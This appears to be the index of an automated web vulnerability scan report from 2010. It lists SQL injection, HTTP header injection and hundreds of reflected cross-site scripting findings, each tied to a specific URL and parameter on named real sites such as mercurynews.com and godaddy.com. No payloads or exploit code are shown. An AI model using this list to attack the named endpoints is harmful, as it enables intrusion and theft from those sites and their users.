Report generated by Hoyt LLC at Mon Nov 15 12:04:33 CST 2010.


The DORK Report

1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://vacationrentals.mercurynews.com/vacation-rentals/mexico+1+3 [REST URL parameter 2]

1.3. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+san-diego+3+721 [REST URL parameter 2]

1.4. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+santa-cruz+3+749 [REST URL parameter 2]

1.5. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+south-lake-tahoe+3+48283 [REST URL parameter 2]

1.6. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+hawaii+2+11 [REST URL parameter 2]

1.7. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+nevada+las-vegas+3+1552 [REST URL parameter 2]

1.8. http://www.associatedcontent.com/article/6007620/pop_print.shtml [Referer HTTP header]

1.9. http://www.bing.com/fd/sa/0807035841/PostContent.js [REST URL parameter 2]

2. HTTP header injection

2.1. http://111.xg4ken.com/media/redir.php [client parameter]

2.2. http://111.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.3. http://111.xg4ken.com/media/redir.php [url[] parameter]

2.4. http://111.xg4ken.com/media/redir.php [utm_campaign parameter]

2.5. http://111.xg4ken.com/media/redir.php [utm_medium parameter]

2.6. http://111.xg4ken.com/media/redir.php [utm_source parameter]

2.7. http://111.xg4ken.com/media/redir.php [utm_term parameter]

2.8. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/q1.mng_bang/news_fr [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/q1.mng_bang/news_fr [sz parameter]

3.5. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 1]

3.6. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 2]

3.7. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [REST URL parameter 3]

3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

3.9. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [sz parameter]

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.11. http://ads.specificmedia.com/serve/v=5 [m parameter]

3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

3.13. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [PID parameter]

3.14. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [query parameter]

3.15. https://auctions.godaddy.com/ [ci parameter]

3.16. https://auctions.godaddy.com/ [ci parameter]

3.17. https://auctions.godaddy.com/ [ci parameter]

3.18. https://auctions.godaddy.com/ [domain parameter]

3.19. https://auctions.godaddy.com/ [domain parameter]

3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]

3.23. http://bayareamarketplace.kaango.com/ads/search [search parameter]

3.24. http://bayareamarketplace.kaango.com/feListAds [search parameter]

3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]

3.26. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

3.27. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

3.28. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]

3.30. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [l parameter]

3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]

3.32. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 18]

3.33. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 4]

3.34. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 18]

3.35. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 4]

3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]

3.37. http://consumertipsonline.net/health/us4.php [t parameter]

3.38. http://counter.goingup.com/js/tracker.js [b parameter]

3.39. http://counter.goingup.com/js/tracker.js [st parameter]

3.40. http://ds.addthis.com/red/psi/p.json [callback parameter]

3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]

3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]

3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]

3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]

3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]

3.46. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard [mbox parameter]

3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

3.48. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 1]

3.49. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 2]

3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]

3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]

3.52. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]

3.53. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]

3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]

3.55. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]

3.56. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]

3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]

3.58. http://forums.mercurynews.com/forum/news [REST URL parameter 1]

3.59. http://forums.mercurynews.com/forum/news [REST URL parameter 2]

3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]

3.61. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]

3.62. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]

3.63. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]

3.64. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]

3.65. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]

3.66. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]

3.67. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 1]

3.68. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 2]

3.69. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 3]

3.70. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 4]

3.71. http://forums.mercurynews.com/forums/jrss/forum/602/5 [callback parameter]

3.72. http://forums.mercurynews.com/forums/jrss/forum/602/5 [js_param1 parameter]

3.73. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]

3.74. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]

3.75. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 1]

3.76. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 2]

3.77. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 3]

3.78. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 1]

3.79. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 2]

3.80. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 3]

3.81. http://forums.mercurynews.com/poll [REST URL parameter 1]

3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]

3.83. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 1]

3.84. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 2]

3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]

3.86. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 1]

3.87. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 2]

3.88. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 1]

3.89. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [REST URL parameter 2]

3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]

3.91. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 1]

3.92. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [REST URL parameter 2]

3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]

3.94. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 1]

3.95. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 2]

3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]

3.97. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 1]

3.98. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 2]

3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]

3.100. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 1]

3.101. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 2]

3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]

3.103. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 1]

3.104. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 2]

3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]

3.106. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 1]

3.107. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 2]

3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]

3.109. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 1]

3.110. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 2]

3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]

3.112. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 1]

3.113. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 2]

3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]

3.115. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 1]

3.116. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 2]

3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]

3.118. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 1]

3.119. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 2]

3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]

3.121. http://forums.mercurynews.com/xml/comments [REST URL parameter 1]

3.122. http://forums.mercurynews.com/xml/comments [REST URL parameter 2]

3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]

3.124. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 1]

3.125. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 2]

3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]

3.127. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]

3.128. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]

3.129. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 1]

3.130. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 2]

3.131. http://ib.adnxs.com/ttj [pubclick parameter]

3.132. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

3.133. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpck parameter]

3.134. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

3.135. http://img.mediaplex.com/content/0/14662/102883/728x90_theater.html [mpvc parameter]

3.136. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.137. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.138. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.139. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.140. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.141. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.142. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.143. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.144. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.145. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.146. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.147. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.148. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.149. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.150. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.151. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.152. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.153. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.154. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.155. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.156. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.157. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.158. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.159. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.160. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.161. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.162. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.163. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.164. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.165. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.166. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.167. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.168. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.169. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.170. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.171. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.172. http://jqueryui.com/themeroller/ [fcActive parameter]

3.173. http://jqueryui.com/themeroller/ [fcContent parameter]

3.174. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.175. http://jqueryui.com/themeroller/ [fcError parameter]

3.176. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.177. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.178. http://jqueryui.com/themeroller/ [fcHover parameter]

3.179. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.180. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.181. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.182. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.183. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.184. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.185. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.186. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.187. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.188. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.190. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.191. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.192. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.193. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.194. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]

3.197. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]

3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]

3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

3.200. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]

3.201. https://secure.www.mercurynews.com/registration/ [rPage parameter]

3.202. https://secure.www.mercurynews.com/registration/ [url parameter]

3.203. https://secure.www.siliconvalley.com/registration/ [rPage parameter]

3.204. https://secure.www.siliconvalley.com/registration/ [url parameter]

3.205. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

3.206. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

3.207. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

3.208. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

3.209. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

3.210. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

3.211. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

3.212. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

3.213. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

3.214. http://shops.godaddy.com/Netnutri-com/Fruta-Planta-30-Capsules-Reduce-Weight-Fruta-Planta-980944/ [isc parameter]

3.215. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

3.216. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]

3.217. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]

3.218. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]

3.219. http://shops.godaddy.com/SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/ [isc parameter]

3.220. http://shops.godaddy.com/SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/ [isc parameter]

3.221. http://shops.godaddy.com/aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/ [isc parameter]

3.222. http://shops.godaddy.com/aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/ [isc parameter]

3.223. http://shops.godaddy.com/default.aspx [isc parameter]

3.224. http://shops.godaddy.com/default.aspx [isc parameter]

3.225. https://shops.godaddy.com/ [isc parameter]

3.226. https://shops.godaddy.com/ [isc parameter]

3.227. http://redcated/AAS/iview/260696261/direct [REST URL parameter 4]

3.228. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.229. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.230. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]

3.231. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.232. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.233. http://redcated/AAS/iview/260696261/direct [wi.728;hi.90/01/7275753708?click parameter]

3.234. http://redcated/BJ1/iview/214582710/direct/01 [REST URL parameter 4]

3.235. http://redcated/BJ1/iview/214582710/direct/01 [click parameter]

3.236. http://redcated/BJ1/iview/214582710/direct/01 [click parameter]

3.237. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.238. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.239. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]

3.240. http://redcated/CNT/iview/259243902/direct [REST URL parameter 4]

3.241. http://redcated/CNT/iview/259243902/direct [click parameter]

3.242. http://redcated/CNT/iview/259243902/direct [click parameter]

3.243. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.244. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.245. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]

3.246. http://redcated/CNT/iview/259243905/direct [REST URL parameter 4]

3.247. http://redcated/CNT/iview/259243905/direct [click parameter]

3.248. http://redcated/CNT/iview/259243905/direct [click parameter]

3.249. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.250. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.251. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]

3.252. http://redcated/ER1/jview/203115616/direct/01 [REST URL parameter 4]

3.253. http://redcated/ER1/jview/203115616/direct/01 [click parameter]

3.254. http://redcated/ER1/jview/203115616/direct/01 [name of an arbitrarily supplied request parameter]

3.255. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]

3.256. http://redcated/K01/iview/208297447/direct/01/5244128 [REST URL parameter 4]

3.257. http://redcated/K01/iview/208297447/direct/01/5244128 [click parameter]

3.258. http://redcated/K01/iview/208297447/direct/01/5244128 [click parameter]

3.259. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.260. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.261. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]

3.262. http://redcated/NYC/iview/266847916/direct/01/8785527227 [click parameter]

3.263. http://redcated/NYC/iview/266847916/direct/01/8785527227 [name of an arbitrarily supplied request parameter]

3.264. http://redcated/TLC/jview/242390407/direct/01 [REST URL parameter 4]

3.265. http://redcated/TLC/jview/242390407/direct/01 [click parameter]

3.266. http://redcated/TLC/jview/242390407/direct/01 [click parameter]

3.267. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]

3.268. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]

3.269. http://weather.mercurynews.com/cgi-bin/findweather/getForecast [brand parameter]

3.270. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.271. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.272. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.273. http://www.airbnb.com/search/ [c parameter]

3.274. http://www.airbnb.com/search/ [location parameter]

3.275. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]

3.276. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]

3.277. http://www.associatedcontent.com/action_flag.shtml [redir parameter]

3.278. http://www.associatedcontent.com/recaptcha_iframe.shtml [comment_name parameter]

3.279. http://www.associatedcontent.com/recaptcha_iframe.shtml [content_type parameter]

3.280. http://www.associatedcontent.com/recaptcha_iframe.shtml [content_type_id parameter]

3.281. http://www.associatedcontent.com/recaptcha_iframe.shtml [disp_type parameter]

3.282. http://www.fi.com/weballey/alleyletter.aspx [CC parameter]

3.283. http://www.fi.com/weballey/alleyletter.aspx [CC parameter]

3.284. http://www.fi.com/weballey/alleyletter.aspx [PC parameter]

3.285. http://www.fi.com/weballey/alleyletter.aspx [PC parameter]

3.286. http://www.godaddy.com/Hosting/Legacy.aspx [name of an arbitrarily supplied request parameter]

3.287. http://www.godaddy.com/email/email-hosting.aspx [name of an arbitrarily supplied request parameter]

3.288. http://www.godaddy.com/hosting/web-hosting.aspx [name of an arbitrarily supplied request parameter]

3.289. http://www.godaddy.com/hosting/website-builder.aspx [name of an arbitrarily supplied request parameter]

3.290. http://www.godaddy.com/ssl/ssl-certificates.aspx [name of an arbitrarily supplied request parameter]

3.291. https://www.godaddy.com/gdshop/email.asp [name of an arbitrarily supplied request parameter]

3.292. https://www.godaddy.com/gdshop/hosting/hosting_build_website.asp [name of an arbitrarily supplied request parameter]

3.293. https://www.godaddy.com/gdshop/ssl/ssl.asp [name of an arbitrarily supplied request parameter]

3.294. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

3.295. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

3.296. http://www.hotelsoup.com/hotel.php [query parameter]

3.297. http://www.hotelsoup.com/hotel.php [query parameter]

3.298. http://www.infotrak.com/Widgets/ [width parameter]

3.299. http://www.mercurynews.com/mngi/tracking/track [c parameter]

3.300. http://www.mercurynews.com/mngi/tracking/track [n parameter]

3.301. http://www.mercurynews.com/mngi/tracking/track [s parameter]

3.302. http://www.mercurynews.com/mngi/tracking/track [t parameter]

3.303. http://www.pressdemocrat.com/article/20101114/NEWS/101119731/0/business [REST URL parameter 3]

3.304. http://www.pressdemocrat.com/article/20101114/NEWS/101119731/0/business [REST URL parameter 4]

3.305. http://www.sfgate.com/cgi-bin/article.cgi [type parameter]

3.306. http://www.sigalert.com/Portlet/Map.asp [partner parameter]

3.307. http://www.sigalert.com/Portlet/Map.asp [url parameter]

3.308. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 1]

3.309. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 2]

3.310. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 3]

3.311. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [REST URL parameter 5]

3.312. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [name of an arbitrarily supplied request parameter]

3.313. http://www.vacapedia.com/search_widget.php [_h parameter]

3.314. http://www.vacapedia.com/search_widget.php [_h parameter]

3.315. http://www.vacapedia.com/search_widget.php [_w parameter]

3.316. http://www.vacapedia.com/search_widget.php [_w parameter]

3.317. http://www.vacapedia.com/search_widget.php [affid parameter]

3.318. http://www.vacapedia.com/search_widget.php [paidid parameter]

3.319. http://www.vacapedia.com/search_widget.php [swt parameter]

3.320. http://www.zillow.com/cobrand/CobrandWidgetPage.htm [REST URL parameter 1]

3.321. http://www.zillow.com/cobrand/CobrandWidgetPage.htm [REST URL parameter 2]

3.322. https://auctions.godaddy.com/ [Referer HTTP header]

3.323. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.324. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.325. http://www.radiogodaddy.com/ [Referer HTTP header]

3.326. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [cli cookie]

3.327. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [cli cookie]

3.328. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 1]

